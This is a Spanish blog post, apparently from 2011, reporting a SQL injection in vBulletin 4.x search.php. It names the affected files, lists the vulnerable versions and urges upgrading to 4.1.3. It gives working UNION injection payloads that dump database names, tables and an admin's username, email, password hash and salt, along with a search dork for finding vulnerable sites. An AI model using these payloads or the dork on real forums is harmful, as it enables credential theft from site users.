Mostrando entradas con la etiqueta SQL en search.php. Mostrar todas las entradas
Mostrando entradas con la etiqueta SQL en search.php. Mostrar todas las entradas

31 de mayo de 2011

vBulletin vulnerable a inyección SQL en search.php

 

 

 

 

 

Mirando las ultimas inyecciones sql que se han descubierto me tope con esta en el blog de "hackplayers"

vBulletin es un famoso software de foros basado en PHP y MySQL. El mes pasado se reportó una seria inyección SQL que afectaba a sus versiones 4.0.x, 4.1.0, 4.1.1 y 4.1.2 y recientemente esa vulnerabilidad se está empezando a utilizar para atacar e infectar a múltiples foros.

El código vulnerable se encuentra en:
/vb/search/searchtools.php – línea 715;
/packages/vbforum/search/type/socialgroup.php – línea 201:203;

Y podemos inyectar las sentencia SQL a través de la búsqueda (search.php), concretamente en la petición POST de "Búsqueda con múltiples tipos de contenido" marcando "Grupos":



Ej:
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0×3a,email,0×3a,password,0×3a,salt)
FROM user WHERE userid=1#

Actualmente existen multitud de sitios vulnerables (Dork : inurl:"search.php?search_type=1") por lo que ¡se recomienda actualizar lo antes posible a la versión 4.1.3!

versiones vulnerables:
vBulletin Publishing suite

  • 4.1.2

  • 4.1.1

  • 4.1.0 PL2

  • 4.0.8 PL2

  • 4.0.7

  • 4.0.6

  • 4.0.5

  • 4.0.4 PL1

  • 4.0.3 PL1

  • 4.0.2 PL4

  • 4.0.1

  • 4.0.0 PL1


vBulletin Forum classic

  • 4.1.2

  • 4.1.1

  • 4.1.0 PL2

  • 4.0.8 PL2

  • 4.0.7

  • 4.0.6 PL1

  • 4.0.5

  • 4.0.4 PL1

  • 4.0.3 PL1

  • 4.0.2 PL4

  • 4.0.1

  • 4.0.0 PL1



Referencias:
Sucuri Research Blog
Information Security News and Exploits
J0hn.X3r